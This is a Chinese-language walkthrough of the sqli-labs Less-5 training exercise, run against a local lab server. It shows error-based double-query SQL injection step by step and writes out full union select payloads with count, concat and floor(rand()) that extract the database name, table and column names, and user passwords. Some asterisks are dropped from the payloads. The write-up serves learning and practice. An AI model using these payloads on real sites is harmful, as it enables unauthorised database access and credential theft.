Less-5

0x01
首先不断改变id的值,发现最大是14,只要超过14就不会显示you are in...可以知道正确的情况是会返回you are in....错误的情况要么报错, 要么不显示you are in....

0x02
尝试添加单引号,发现报错,猜测是类似于Less-1的那种字符型

1.png

0x03
利用order by num查找最多有几列数据可以显示, 方便等会利用union select查询
,发现3可以,4就提示超过

2.png
3.png

0x04
本关叫做双注入GET单引号字符型注入,双注入网上说是两个select.
构造payload: union select count(*),1, concat('_{',(payload),'}', floor(rand()*2)) as a from information_schema.tables group by a --+

查询数据库名
http://192.168.88.130/sqllab/Less-5/?id=1' union select count(),1, concat('~',(select database()),'~', floor(rand()2)) as a from information_schema.tables group by a --+

7.png
8.png
有时候抓取不到是因为双注入用到了rand()这个函数,用来产生一个随机数

0x05
爆出表名
payload: union select count(),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~', floor(rand()2)) as a from information_schema.tables group by a --+

1.png
如果想要爆出所有表名只要更改limit 后面的数就好了
union select count(),1, concat('~',(select table_name from information_schema.tables where table_schema='security' limit 1,1),'~', floor(rand()2)) as a from information_schema.tables group by a --+
这里我们选择users表
2.png

0x06
爆出users表中的列名

3.png
4.png
5.png
6.png

发现limit 3返回的一直都是you are in...猜测列名报完了

0x07
爆数据内容
查username
http://192.168.88.130/sqllab/Less-5/?id=1'union select count(),1, concat('~',(select username from users limit 0,1),'~', floor(rand()2)) as a from information_schema.tables group by a --+

7.png
8.png
9.png
查password
http://192.168.88.130/sqllab/Less-5/?id=1'union select count(),1, concat('~',(select password from users limit 0,1),'~', floor(rand()2)) as a from information_schema.tables group by a --+
10.png
11.png